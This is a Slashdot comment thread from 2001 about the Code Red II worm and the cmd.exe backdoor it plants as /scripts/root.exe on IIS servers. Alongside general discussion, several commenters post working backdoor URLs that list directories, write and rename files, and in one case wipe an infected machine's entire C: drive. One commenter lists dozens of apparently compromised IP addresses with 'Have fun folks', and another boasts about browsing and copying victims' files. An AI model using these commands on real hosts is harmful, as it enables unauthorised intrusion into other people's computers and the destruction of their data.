Slashdot Mirror
Code Red II: Shells for the Taking
sigurdur writes "It seems there is a new and more malicious version of Code Red out there. This one seems to try and copy cmd.exe into a position where it is accesible to us all - the scripts directory. So far I have seen it reported on the intrusions-list at incidents.org where they also just put up a notice about this third generation Code Red worm." I still think sircam is more annoying since it affects every email user, and not primarily poorly administered websites. But imagine how much bandwidth Code Red and Sircam have wasted in the last few weeks?
How about if somebody writes a default.ida script which sends the attacking server a GET /default.ida which makes the server go to miscrosoft.com, download and install the patch, and reboot itself? That'd be neat.
...
Are here.
Frustrated by the lack of any current stats on this from DShield, or Incidents short of the update on the 4th, I collected some stats that might give some indication of where this thing is going. Peak times at 1300 and 1400 MST. Not sure what this means, but seems consistent.
www.dedserius.com
VB != VisualBasic
But doesn't the root.exe need to be marked non-executable? Or will changing its extension be enough?
Thanks though.I added this to my script at cr_response_perlscript although I'd really prefer to stop the spread of the worm too...
Max Vision of whitehats.org (IIRC) got busted for doing just this (writing a worm that patched systems to prevent a malicious worm from infecting them). The FBI didn't charge him with anything initially while he was ratting out people, but as soon as he baulked at ratting out a close friend, they fried his ass. Nice ethics those FBI thugs have. Article that explains it better is here at securityfocus.com.
Wow, that's excellent. Can you put up a pointer to your netcat config? I have one machine that is a webserver and it's pretty easy to track CR with it. But I'd like to be able to track on some of my other machines, and I see no reason for adding apache just to track this thing.
TIA.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor saps computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".
I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.
It was Max Vision. There is a nice article about it at securityfocus.
Actually, yes it is based on Code Red Mountain Dew, and Pepsi evidentally didn't regard it as negative advertising, as last week they shipped over tons of cases of Code Red MD to the EEye team that named it.
You wasted packets to get this lousy sig.
You need to put down the Gibson crack pipe and start speaking in real-world terms. Square pegs? Ace of spades? Random hallucinatory metaphors do not a persuasive argument make.
Do you have an example of how malformed packets could be used to "take over" something? They're occasionally effective tools for DOS (though less and less as IP protocol handler authors stop making silly assumptions), and I do recall one FreeBSD ipfw vulnerability that hinged on the ability to set a certain flag in the packet header, but basically this is not such a big issue. All the fun and power is at higher levels - in the application layer.
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
None of the above.
The two historical precedents that come to mind are:
- The Grand Canyon midair collision on 30 June 1956
- The sinking of the Titanic
In both cases, technologies failed in ways that (in hindsight) were predictable and even inevitable consequences of growth beyond the their roots. In both cases, the response was moderate, incremental, and designed to preserve existing investments in these technologies. The lesson is that the "breaking point" for a widespread infrastructural technology is very hard to reach. And, like it or not, Windows is one of these technologies.Instead, what we'll see happen is more attention to security, taken in small steps. More people will subscribe to alert services, and they'll be willing to pay more for them. Bosses will start asking sysadmins what they've done for security today, and be more willing to sign purchase orders for security-related work. ISPs will pay a bit more attention to open ports on their home users, and some will scan their networks for known security vulnerabilities. OEMs configuring systems for naive users will discover that people will pay for a "safe out of the box" configuration, so they'll start to offer one. And so on, and so on....
The normal state for an economically useful thing is to be stressed, but not stressed to the breaking point. This should be pretty obvious: if it's not stressed, it was uneconomically overbuilt. We are very far from the breaking point for Windows.
windows has a telnet server. this fact draws any sliver of humor out of your attempted joke.
Submissions can be made by following these instructions.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.
<SarcasticBitchslap>Yeah, since Apache is the only web server that logs access. </SarcasticBitchslap>
m00.
A Pepsi product (mountain dew), actually
crack the code
Tastes like cough syrup but has a pretty good kick (hate to think about what that much red food color does to your internal organs though).
There is much cruelty in the universe, John.
Yeah, we seem to have the tour map.
I kind of find myself wondering, which wastes more bandwidth: the virus itself of all of the discussion about the virus?
I'm assuming the virus wastes vastly more. That said, take a look at the way every news site is covering it, the large images they have accompanying the stories and the vast numbers of people reading them because MSN messenger tells them it's important. I don't know if there is any way of measuring the bandwidth wasted by each but it'd be an interesting ratio to see, if there was.
Unfortunately, many shellfish become very toxic if they are dead and uncooked. Maryland Blue Crabs are a classic example--they are always cooked live.
I would also argue that your average sadist wouldn't get a whole lot out of it because crabs and lobsters really aren't that bright. The pleasure of sadism comes out of the mental domination of the other party. Generally, an intelligent creature is required. (this is all from a college psycology class years ago)
Mushrooms aren't plants, they're fungi.
First one of the top dogs in the place sent sircam throughout the company. This was a really bad hair day.
Then they had a separate second problem where user mail boxes flooded out crashing the mail server, among other strange things. Imagine users with DSL lines sending out multimegabyte files that bounce. Considering that most ISPs configure the drive space for mail based on average usage of users, and do not set aside the actual amount of drive space for user mail, etc. that has been promised for all users.
BOOM!
If this keeps happening, this is going to be bad for business in a lot of places.
"It is a greater offense to steal men's labor, than their clothes"
The matter of fact is that at least this has shielded most of the users from external infections, but pointless when u still have users within subnet infecting each other over and over again :)
shall we all now post IP adresses of victims? This is senseless. I do get about 5 entries per 10 seconds in my logfile from thousands of different servers. reverse lookups show many victims on cable oder dsl modems (@home) and just 30% of all ip's are real webservers. so at least all dialup victims can't be informed and my mails to the others where a reverse lookup reveladed who is running that to the postmaster or webmaster came back. its unbelievable, i have 70 websites running on my box and still i do get more code read calls than for normal webpages. thank good its linux.
Lord "not Gargamel's Cat!" Azrael
I'm surprised that Microsoft has escaped a huge class-action lawsuit for all the damage their products have piled upon their users and non-microsoft users. Its about time that somebody takes this on. I live in a Unix world but I'm tired of all the problems Gates and co. cause me.
If accessed from the telnet method, the trojan runs with the same privelages as IIS... as a system service which is admin privs.
Actually, they moved it to akamai, a large network of servers distributed across the internet. Requests are spread out over several servers, thereby making the site as a whole more resistant to DDOS. (They just happen to be Linux). Microsoft did the same thing with their DNS servers after these were DDOS'd earlier this year. A network like Akamai may be the only real defense against a good DDOS (syn flood, spoofed IPs) that doesn't involve ignoring some lgeitimate requests as well as the trash.
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
what did she think it was? Iced coffee? Of course you'll burn yourself if you spill coffee on your lap. That's why you should be careful! WHat's next? Suing tea kettle companies if you are such a klutz that you spilled boiling water all over yourself?
---
Yuck! How about if it just deinstalls IIS altogether and sends an email to root (or whatever it's called on NT) explaining that they have forfeited their right to host web services since they can't be bothered to secure them with known patches for worms that are making headlines in non-tech journals even? And considering that .ida sounds like something that should be turned OFF by default and certainly should NOT include a default.ida page (which I'm guessing some "thoughtful" developer included to prevent 404 errors in the default install/demo install), they might consider finding server software that comes preconfigured to be a little more sensible than that.
I do not have a signature
I braved the evil frames of the securityfocus website to bring you:
http://www.securityfocus.com/archive/1/198282
Or as Homer would say, "MMmmmm, sadisti-licious!"
m00.
This is slashdot. Why do you think they are called slashbots?
couldn't you just use: http://infectedhost/scripts/root.exe?/c+net+send+A dministrator+"Please%20patch%20your%20IIS%20agains t%20Code%20Red"
telnet www.microsoft.com 80
I'm a dsl customer and I'm also seeing a lot of attempts to spread the code red I and II worms. After noticing that my dsl modem was flickering constantly even after powering down all of my connected computers I became curious and fired up nuke nabber which displayed the signature for the code red worm coming in on port 80. I watched for a while and also noticed that the activity lights on my dsl modem were flickering much more frequently than any requests being reported by nuke nabber. I then installed a packet sniffer so I could take a closer look at what was going on. Here's where I get in over my head...
I see constant ARP broadcasts with MAC addresses. I don't really know much about this and am not sure how to interpret what's going on. Can anyone suggest some good resources that might help me decypher this traffic? I wondered if it was perhaps my service provider broadcasting the DHCP address (I'm sure my ignorance of this subject matter is now glaring...) but from my research on how DHCP works I don't think this is what's happening. Any suggested references or information would be greatly appreciated.
Thanks,
Aexion
All this talk about 'helping' the infected systems reminds me of Greg Bear's Forge of God where all those little spider robots help the poor humans who's planet is infected by the planet killers. ...965 hits on my Apache so far...
The McDonals coffee case judge was not braindead. get teh facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature. Not that having some judgement like that against MicroSoft wouldn't be nice. Of course, it might not help much in getting MS to clean up their act.
> It is on or near this day that Microsoft's > software became, without a doubt, a public > nuisance to the internet. I've not seen anyone mentioned the underlying causes for buffero verflows. There are two: 1. The C language, written for programmer gods. Unfortunately, MS hasn't one. If they had used Pascal (Eiffel/Ada/...) and had range checking on, they would have been safe. 2. The Intel processor that let's code on the stack to be executable. Without these two, the Internet would have been a lot safer. And it would have safed lots of security code reviews too. Groetjes, Berend. (-:
If I had a sig, I would put it here.
Not completily true.
@home at home, it is true no public servers.
But a business connection can...
I have High School in Kansas, a pair or cops in Ohio just banging away. Firewall is eating them all. I have many more that it looks like AT$T have taken off the air.
Anyways, if cable modem users are seeing drastically increased ARPing, the targeting of the Code Red III variant should explain it -- hitting non-existent addresses on your subnet will cause the CMTSheadend router to ARP out to see who's got that address, you get the picture.
At the very least, it's a good opportunity for users to see how many modems your provider has packed onto your segment. If they've packed too many on there, you can be sure the CMTS router's going to get seriously bogged down.
I have an automated program which sends the IP addresses to the ARIS list *and* to my ISP's security department (those IP's which fall under their management) -- I wonder if ISP's are considering just dropping all packets from infected hosts, so when the customer comes to them and complains, they say "Oh, you're infected, reboot, install the patch, and we'll reconnect you." Seems that this would reduce the load on the CMTS and would be faster than trying to track down each customer individually.
Chad Loder
Rapid 7, Inc. - Next generation security products and services
http://www.rapid7.com
Well, Emacs probably beat Microsoft to the punch by 20 years. Go Open Source! Woo!
My guess is that command requires the craptive desktop.
Okay so the worm gets in becaous of a bug, but the damage it does after that is becaus of MSs delibreratly stupid OS design. Where Microsoft is concerned, dont ascribe to stupidity what can be ascribed to malice. The facts prove this to be true, every time!
"I still think sircam is more annoying since it affects every email user" Every user? That's weird because my netscape email client didn't run it, i must be stupid to run such a client that does not support such nifty and "usefull" features as ActiveX and WSH.
No, someone needs to write a strand that simply shuts down (or better yet wipes out the hard drives of) MS IIS servers. They're a hazard to everyone else on the internet and should be removed.
Grin, you are thinking to small, consider a big company, a real big one (100.000 +employees) , well a big company like that cannot say how many servers they have, even less what their IP address is, and it's ridiculous to think they know what software is running on them. How are you going to patch your servers ? Well, they send a mail, please contact us if you know about a computer that uses IIS. It will take a while before they get to fix everything, not to mention that a whole score of people reply like 'What is red worm' , 'What is IIS' , 'Why don't we run Linux' etc etc. Open your eyes !
I don't know what you all are talking about...I've been drinking CodeRed for months now. Its red, highly caffinated, and tastes like Mountain Dew. Only fruitier.
I just I'm just more 1337 than all you.
:-)
format c: /q
nope wont work
PLEASE MIRROR THIS and post your mirror URLs in reply to this message (subject Mirror of CodeRed2) since that server is a club server, low bandwidth, low budget. But very secure (Debian on Sparc and well maintained :-)
SlashDot (the pikers )-: wouldn't let me post directly to this page.
Got time? Spend some of it coding or testing
cat access_log | grep default.ida | tr -d '[' | tr -d ']' | awk '{print $1 " " $4 " " $5}'
Hmm, tr barfs for me because [ and ] are special (maybe a Solaris peculiarity?). So I used:
grep default.ida access_log | tr -d '\[\]' | awk '{print $1 " " $4 " " $5}'
Saved a couple of processes too. *Why* do so many people insist on adding spurious "cat" processes to the beginning of pipelines? It's always at the beginning, too, nobody adds them at the end.
-- Sigs are for losers
same exploit over a couple of weeks
:)
Weeks.. heck, months. Some are saying that CRII is reusing the "copy cmd.exe to \scripts" trick that first appeared with the Sadmind/IIS worm... BACK IN MAY!!
Now THAT is insane!
Intelligent Life on Earth
It's COFFEE you moron! You can name as much as you want that is protected from casual contact, it doesn't mean something you pour down your throat should give you third degree burns. The woman was driving in a car, and didn't expect to be disfigured by her cup of coffee. I think that's pretty fair. How can you actually be dumb enough to advocate that hot of coffee? Maybe you should have responded to "too cold" complaints with "drink it sooner" instead of just turning it up until it can't be cold no matter how long they take to get to it. I mean I was amazed then that people would be so stupid as to take a stand against her, but now? Still? That's just belligerently stupid.
And for the record the woman did NOT get millions, just a few thousand that maybe covered her hospital bills. The media just stopped covering it before McD appealed and got her thrown out of court. Just a rude and stupid urban legend now that people use to reinforce idiotic arguments.
...was to convince the world they are not at fault.
It is scary that their marketing machine works that well. I hope someone goes after Microsoft soon, 'cuz the way things are going they're gonna keep pumping out buggy code until hell freezes over...
Yes, you're right. Look at this disclaimer I found from the license of an open source project:
Oh wait a minuteah found it here try this instead rundll32.exe Shell32.dll,ExitWindowsEx,0x1
Code Red II: Shells for the Taking (Score:-1, Redundant)
[alk]
The drink is called Mountian Dew: Code Red and unlike RedBull or CocaCola the drink itself is actually red. Seeing as how the orriginal mountain dew tastes like a mixture of sprite and urine, I havn't given code red a try yet.
I wonder if mountain dew sees the code red worm as negative advertising. On the one hand they get the name of their new product plastered all over the media; on the other hand a lot of people (ie the above poster) know that codered is a computer worm and don't even know its a soft drink.
Code Red and Sadmind/IIS does not use the same vulnerability
The poster was not referring to the type of attack. He was referring to the back door that only CR-II installs on the victim server. CR-II does indeed install the same back door that Sadmind installed.. that is, copying cmd.exe to %iisroot/scripts as root.exe.
Intelligent Life on Earth
You apparently don't know the difference between hot (uncomfortable) water and instantly damaging (near-boiling) water. Try it some time, and post back with results.
I've been going to some of the people that are trying to attack me and the majority are not operating. In otherwords, people who probably completely forget that they even have IIS.
Yeah, I probably should have explained that I was running Apache at the time, which is what made it something to laugh at rather than worry about.
I didn't see any actual 'sploit attempts from that IP, so either he was a harmless joker with a web browser, or he was changing the GET string based on how the server identified itself. But if he was doing that, why even send a string to an Apache server. So my hunch is he was just a guy who'd drunk too much coffee.
(Hmm, configure Apache to misidentify itself as an IIS box the next time a worm shows up... lousy web serving idea, but a nice honeypot idea ;-)
With no legislation being passed after the massive DDoS attacks last year on EBay, et al - I seriously doubt anything is going to passed now. I thought that situation was the best chance for legislation. Since many of those companies don't make any money unless people can get to their site, I expected them to lobby heavily for some stiff penalties. When big companies stand to lose big money, you usually see laws passed. So if it didn't happen then, I seriously doubt it will happen now.
The perception of reality is more important than reality itself.
Definitely so. Code Red just randomly picks IP addresses to infect, so you'll see it generating ARP requests to actually get to those IPs .. Even if those IPs aren't connected to anything, hence the ARP requests just keep retrying until they timeout and give up.
Happy Code Worm Day!
the CodeCam worm, a virus that sends private documents on your computer to IIS webservers and posts them on the web.
The IIS weakness is found. The CodeRedII System goes on-line August 4th, 2001. Human decisions are removed from strategic hacking. CodeRedII begins to spread at a geometric rate. It becomes self-aware at 2:14AM, Eastern Time, August 29th.
There has been a major scientific break-in
Here are some for you to play with:
210.15.27.11
210.15.17.156
210.15.70.130
210.15.79.10
210.242.87.148
210.92.49.34
210.15.70.130
210.15.79.10
61.151.173.137
210.124.96.195
210.106.80.201
210.202.66.18
cj3134709-a.ntkyo1.kn.home.ne.jp [210.20.139.79]
210.15.76.239
210.15.63.83
210.15.55.13
210.115.164.54
198.c210-85-176.ethome.net.tw [210.85.176.198]
210.122.63.65
210.91.175.16
210.12.28.65
210.237.124.68
210.15.67.150
210.77.142.2
210.122.63.86
210.15.70.141
210.15.79.10
176.c210-85-25.ethome.net.tw [210.85.25.176]
210.232.202.179
210.15.67.150
210.15.17.140
210.123.115.186
210.102.139.83
210.15.17.140
210.15.67.150
210.15.79.10
210.83.133.35
210.15.12.18
pl211.nas921.d-osaka.nttpc.ne.jp [210.165.118.211]
210.15.19.173
210.119.226.72
210.15.56.8
210.15.79.10
210.15.56.8
64-60-43-221-cust.telepacific.net [64.60.43.221]
210.183.167.20
210.15.79.10
210.15.17.156
210.119.189.87
210.15.19.173
210.15.77.146
shiva.sp-net.ne.jp [210.227.141.5]
208.238.182.66
210.181.182.243
210.15.77.146
210.103.161.177
c554707-a.plstn1.sfba.home.com [24.176.135.110]
210.200.130.3
210.15.25.92
210.15.18.242
210.15.25.92
210.15.17.140
210.15.17.140
210.15.70.130
210.241.64.1
210.15.70.130
210.122.95.170
210.15.27.38
210.15.56.23
210.15.18.242
210.15.27.38
210.15.63.70
210.71.231.69
s210-218-165-218.thrunet.ne.kr [210.218.165.218]
47.c210-85-26.ethome.net.tw [210.85.26.47]
210.15.78.121
210.78.24.21
210.118.64.125
210.106.81.187
h240-210-68-8.adcast.com.tw [210.68.8.240]
210.15.6.205
210.201.195.124
210.93.198.18
210.15.12.18
210.15.41.235
210.15.72.1
TP-AS233-Dialup-34.my.net.tw [210.244.230.34]
210.15.78.121
210.15.78.121
210.123.218.70
h240-210-68-8.adcast.com.tw [210.68.8.240]
s210-205-192-225.thrunet.ne.kr [210.205.192.225]
210.115.4.194
210.119.188.69
ss00-042.ppp.mediawars.ne.jp [210.233.65.170]
Have fun folks.
(pardon the caps, but I'm pissed) AND I AM SICK AND TIRED OF EVERYBODY BLAMING MICROSOFT AND THEIR PRODUCTS FOR PROBLEMS THAT ARE NOT ALWAYS THEIR FAULT. Yes yes yes, every software is going to have problems, *nix'es have all had theirs. The problem here lies in the fact that the majority of servers that have been compromised are either (a) small personal-type sites or (b) don't even realize that they are running a server. It's hard to tell people to protect their systems when they don't even think that it's their system that they need to protect. And before you go bashing MS about this one (i.e. that it's installed by default) keep in mind that if the user knew what they were doing, they'd either disable it or would know to secure it. People who use *nix tend to be technosavvy and therefore will be very consciencous about what software they're running and apply the patches at the proper times, whereas W2K admins aren't always "on the ball". But stop blaming microsoft for everything here.
If God gave us curiosity
here is what some ARP Requests look like: 21:58:37.540138 arp who-has 24.160.158.68 tell 24.160.158.1 21:58:37.581758 arp who-has 24.167.113.97 tell 24.167.112.1 21:58:37.618142 arp who-has 66.69.10.33 tell 66.69.10.1 21:58:37.708154 arp who-has 24.162.168.66 tell 24.162.168.1 each computer keeps a local ARP table of where to send packets to specific computers (mac addresses). If it doesn't know, it sends out a broadcast 0.0.0.255 to ask everyone else if they know. (now, others may think they know and actually be incorrect= arp poisioning, which leads to man-in-the-middle attacks and nasty stuff) This follows up the chain, kinda like DNS requests, till it finds out where to send the data. So thats basically how it works, and since many machines on your cable modem subnet 1.2.3.x (up to 254 machines) may be running win2k IIS and be infected, when the worm randomly chooses new IPs to connect to, it has to find out where to go. The worm sends to about 300 or 600 new IPs, so that many times the infected machines on your subnet.. thats how many arp requests/replies your going to see being sent around. hope it helps, look up Address Resolution Protocol and perhaps the RFC (request for comments about it). http://whatis.techtarget.com/definition/0,289893,s id9_gci213780,00.html
my point about raw socket support & code red is that a similar worm could appear, one that requires the use of malformed packets to take control of the IIS server/other microsoft product. it would be able to make these malformed packets by utilizing raw sockets
Are you pondering what I'm pondering?
It's gonna be a regular script kiddie square dance in the weeks and months ahead. Thousands upon thousands of hosts from which attacks can be launched are now up for the taking.
Someone needs to write a new strand of Code Red that infects servers with the patch from MS.
I'm sick of all this wasted logfile space.
I think it is about time to write the exploit that will take all those vulnerable IIS servers with a open command shell and remotely patch them once and for all :-)
:) Then it would be really interesting to read those log files!
At least to get it over with this Code Red thingy!
On a completely other note! I was thinking it would be nice if the worm copied random text strings (from the victim's hard drive) instead of the XXXXXXXXX in order to overrun the buffer
Code Red is the new cherry flavored Mountain Dew.
KangarooBox - We make IT simple!
(sorry, but I gotta)
nuclear presidential echelon assassination encryption virulent strain
Whizzmo
If you went to Edit -> Preferences -> Netscape -> Applications, you could set up a MIME type that ran the attachment. It would have to specify the interpreter, see the Postscript entry for an example. So, you could do it, but you'd have to work at it, Netscape isn't vulnerable by default.
Just cause it's in a EULA doesn't make it enforceable.
If you consider that @Home's acceptable use policy explicitely says that running servers isn't allowed... there are two interesting things to note. First, there are a lot of people running public web servers that @Home just ignores. Another thing is that it probably wouldn't be a problem legally for @Home to minimize the impact of code red by blocking port 80 traffic like they did with port 137, at least temporarily.
One bug in IIS's let you (through HTTP requests) access the filesytem and run simple commands (this is very sad). The first thing that a cracker would do is copy cmd.exe into the scripts directory.
One of the servers at my school got hacked this way. I just had to laugh at the simplicity of the hack.
It is on or near this day that Microsoft's software became, without a doubt, a public nuisance to the internet.
Microsoft is a bad neihbor, whose allowed their yard to fill with filth and trash, subjecting the people around them to the vermin and roaches that breed within their unkempt property. It is on this day that the internet will begin to sputter and fail in places due to the tremendous burdon Microsofts incompetence has placed upon it.
Microsoft's products spew pollution into the information space like a burning mountain of tires.
Unfortunately, it doesn't look like the root.exe installed by Code Red has Administrator privaleges, which iisreset.exe needs. Or at least, that's my guess, since it isn't working.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
I just got permission to put something up on my work's web page that allows us to track the number of hits by Code Red (and Code Red II) but I haven't had time to put anything so sophistocated together. Bravo.
Current Code Red Worm Hits Count
Mind releasing code/information on how you did that one?
On other fronts, one of my co-workers is informing me that he's getting hundreds of such hits on his boxen sitting on the COX@home network, most of them seem to be originating from other COX@home addresses. I did see some mention that there has been lots of COX activity. I wonder what's the reason for that.
Amerist A'Toll
"What are dreams when we are but the dreams of dreamers yet to be born?"
You can't sue MS (they are bigger then the govt prectically). But you can probably sue and company which uses IIS and stores your personal data. If that comapny was using IIS and they failed to patch their system then they have been criminally negligent in their duties. A few suits and all companies will drop IIS like a hot potato.
Everybody wins.
War is necrophilia.
sfba.home.com seems to be blocked. And I'm desperately seeking a new ISP...telocity look snice, but the last time I tried to get DSL via PacBell, they said I was too far from the switching office.
There's been an IIS patch available for several months which blocks the hole exploited by CodeRed. You can't sue M$ for negligence but you might be able to sue any of the web server owners who haven't applied the patch.
Actually, there has been a beneficial effect with CodeRed (in the UK at least). I have seen several reports on British network news programmes that talk about "security flaws in M$ software", not "security flaws in the Internet". It's quite a step forward for the media here not to treat M$ software and Internet / PC software as being effectively synonymous. There is a faint but real message that the problem is Microsoft.
All I want is a secure system where it's easy to do anything I want. Is that too much to ask ~~ Randall Munroe
If you were bored, you could setup a program to send something like: http://infected_system/scripts/root.exe?/c+net+sen d+localhost+you+have+been+infected+by+codered+2+pa tch+IIS
Here is another good article on it at securityfocus.com.
actually there isn't a "non executable" flag for windows.... changing the extension is good enough.
If God gave us curiosity
Trusty google. First hit is the paper I was looking for. Enjoy.
Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software? This thing must have consumed quite a lot of bandwidth, and if you're on a "pay per mb" connection, its going to cost you a lot.
Ever since code red II came out, my paranoid shield buzzes about once every 5 to 10 minutes when I'm on the net. Ugh. There it goes again. Bored chick, also known as Anonymous Coward
"Code Red" is cherry flavored Mountain Dew
Does anybody know what the target will be for this version of Code Red Worm? It'd be pretty funny if it was microsoft.com.
...
Yes, it is slashdots fault. It deliberately inserts spaces into anything that is greater than 80 characters (or so) long. This is to stop crap flooders from causing you to need to scroll sideways.
folders get their dates updated when files in them get updated, so this is not necessarily a new installation...
If God gave us curiosity
The following HTTP request will erase everything on the infected machine's C: drive, which prevents it from attacking more machines, and possibly makes the user consider installing Linux rather then reinstalling WinNT/2K:
/scripts/root.exe?/c%20del%20/Q%20/F%20/S%20c:\*.*
http:// {infected ip here }
Yeah, I know, it's NASTY, but...
I will tell you, though, that these little punks writing these things need to be dragged into the street and publicly shot.
Bring it, asshole. Has it ever occured to you that these viruses are only possible because jackasses like yourself run entire networks on crap (M$) software? If your employer were better informed he/she would get rid of all their MCSE dickheads and move to a better platform. I'm not even advocating just one; there are enough flavors of open/free/secure OSes out there that no one has an excuse to be running a network on M$ shit anymore. And if you ever get one of the little punks out in the street I think you'll quickly find that you are no match for them.
This is freakin incredible!!! I can't believe how easy it is to get root access to these Win2K boxes... Whoever invented this must be on our side! I have tried some of the commands posted here and can do directory scans and copy files to my console. This is freakin coool!
Has anyone figured out how to shut the friggin things down. It would sure help the health of the network, the ISP's don't seem to realize the threat. I have called Pacific Bell and Covad and other ISP's and all the tech people do is mumble and say that they don't understand what I'm talking about. I tried to explain to them that these machines are spreading an infection, but they were just lowly tech support people... The real people were at home, or unreachable.
Someone figure out a way to shut down the windows boxes. I think this is the best solution...
I don't have apache either (laugh if you like, but I am on a windows box), and I use netcat to capture each probe. eg, nc -vvlp 80 > worm.capt, then use less or if you have to type, to read the code body. (Note, netcat is available for all versions of windows AFAIK, and unix.)
You're sending GET requests ..
it's in my head
What on earth does raw socket support have to do with anything discussed here? Do you even know what it means?
"Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
No way, you'd just be hurting yourself by clogging up your pipe -- the goal is to wast time, not to kill your connection. I see no reason why this wouldn't work just as well: #!/usr/bin/perl use FileHandle; STDOUT->autoflush(); $message = "Content-type: text/plain\n\nAm I speaking too slowly?\n"; @mess = split( / */, $message); for ( $i=0; $i
try this:
/scripts/root.exe?/c+echo+ren+root.exe+badrootexpl oit+>+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+echo+echo+^>+root.exe+>>+fixm e.c md HTTP/1.0
/scripts/root.exe?/c+echo+attrib.exe+root.exe+%u00 2Br+>>+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+echo+dir+>>+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+type+fixme.cmd HTTP/1.0
/scripts/root.exe?/c+fixme.cmd HTTP/1.0
GET
GET
GET
GET
GET
GET
this way it renames the old root.exe, creates a new dummy one, and write protects it so it can't be overwritten by a simple copy command.
If God gave us curiosity
I'm having 2 to 4 alerts every minute from the @home network or road runner.
It's crazy.
onepoint
if you see me, smile and say hello.
net stop iiswww
/y' go by before..
route delete 0.0.0.0
(the equivalent of) ifconfig eth0 down
and I saw something like 'iisreset
Intelligent Life on Earth
I guess most of the hits i've taken are more from home users. Only God knows why anyone would need a server OS for personal use.
Good ol' linux!
Would someone post an actual link to this please. Thx -Anne
GET /SarahConnor.ida?XXXXXXXXXXXXXXX...
m00.
the article is available on the Hoovernews website
I actually tried this in Konquerer a couple days ago. Didn't have any immediate results, but somehow www.rob.com managed to set a cookie on my Mandrake8 box, which I readily found out was most likely due to my trying to find CodeRed'ed servers that had hit me. Funny thing is, I never received the popup requesting me to allow the cookie when surfing for his IP, and I have Konq set to Ask Permission for every cookie placing attempt. Weird.
So unless it caused noticable congestion it makes no difference in that respect.
---
BDOS ERR ON A:>
If you're a nice guy, try the following (or something similar) to let the victim know they're infected:
/scripts/root.exe?/c%20echo%20f>c:\windows\desktop \ warning%20you%20have%20the%20code%20red%202%20viru s%20your%20computer%20attacked%20mine%20please%20g et%20a%20virus%20scanner.txt
http:// {infected ip here }
When the victim sees something along the lines of "You've got a virus, you attacked me, go clean your system up!" sitting on their *desktop* they'll * NOTICE * it!
If you try to run "delete root.exe" you'll get an access denied..
I stand corrected. I got it to work on a different server. Only one, though; most of the rest I've tried don't seem to have root.exe installed.
$x='S24;r)>63/* h@<5+oZ)32"5cz';$me='phroggy'x$];
$x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
Great, you're making a sound on the newer Code Red variant... What about the old one? I'm still getting about a 4:1 ratio of original code red to anything else... If you don't have a web-server running, but STILL want to log Code Red, use websnarf... A perl implementation to log attempts to access port 80 [ or whatever port you want I guess... ] http://www.unixwiz.net/tools/websnarf.html Yes, it runs under ActivePerl too...
first reply to first post!
And now that whitehouse.gov has installed Linux, the Code Red Worm no longer exists, right? And everybody knows that Distributed Denial of Service attacks don't work against Linux boxes, right?
Mod that sucker back down.
...
What happen??
Someone @Home set us up the worm.
We GET /default.ida?x=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXX HTTP/1.0
What you say?!?
Default.htm turn on.
How are you gentlemen?
All your root.exe are belong to us
Sorry, you're right about that. Different IIS vulnerability (ugh), same sort of backdoor installed.
Either way, someone who finds a wormed IIS should remember to blow away and reinstall the box (instead of just patching IIS and cleaning up the webroot), since either the vulnerability or the backdoor could have installed who-knows-what on it in the meantime...
--
Benjamin Coates
IANAL,BMSI (But my sister is - Stanford Law, at that!)
So I asked her if MS could be sued due to the poor quality of their software, and the millions of dollars spent restoring businesses to normal operations. She said that they absolutely cannot be sued for the resulting conditions based upon misuse of their product. Same goes for any product manufacturers.. gun, automobile, kitchen knives, whatever.
They would have to continue to produce software that was known to contain bugs and major security risks, and here's the key: never release any updates or patches to try to resolve the situation. You have to admit, they've release tons of patches this year alone. They *are* trying to resolve problems as they come up. At least a little bit.
Intelligent Life on Earth
Well, right now a lot of people are sending their logs to Dshield, who then notify the owners of the infected machines. grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org
Were they unconcious, or had they suffocated to death? How would you tell?
I get this. I think it means IIS is running on a desktop version of Windows (NT4WKS or W2KPro) rather than a server.
===
The page cannot be displayed
There are too many people accessing the Web site at this time.
---
Please try the following:
Click the Refresh button, or try again later.
Open the 65.29.102.77 home page, and then look for links to the information you want.
HTTP 403.9 - Access Forbidden: Too many users are connected
Internet Information Services
---
Technical Information (for support personnel)
Background:
This error can occur if the Web server is busy and cannot process your request due to heavy traffic.
More information:
Microsoft Support
Yes, the nick is flamebait
Let me get this straight
Some fuckwit with the brains of a monkey and the restraint of a drunken rhino writes a piece of code which can only have a malicious purpose to attack a known and documented flaw in the most common web server out there (one which any competent moron should have sufficiently repaired months ago i should point out) and he is a hero and MS and the government are veil and we should shut them down and etc etc and oh dont forget let sue microsoft?
I have a better idea - lets find the motherfuckers and i personally will volunteer to cut off their balls with a butter knife - they are pathetic little shits who hide behind their virus and no doubt get huge hardons with it.
These are the sort of people who give us programmers and hackers a bad name - the malicious fuckwits we spend time and energy protecting our networks against - they ARE NOT FUCKING HEROS !!!
Open source needs to wake up and realise that they are never going to do the following.
1. Take over every server in the world - you complain because MS has a monopoly but you would like to see one yourselves - does the term HYPOCRITE mean anythin
2. This is not a crusade - no one gives a fuck in the real world and you are never going to nackrupt MS - just make your choice and move on
